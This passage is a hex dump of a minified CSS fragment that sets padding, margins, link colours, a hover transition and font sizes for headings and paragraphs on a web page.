64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b |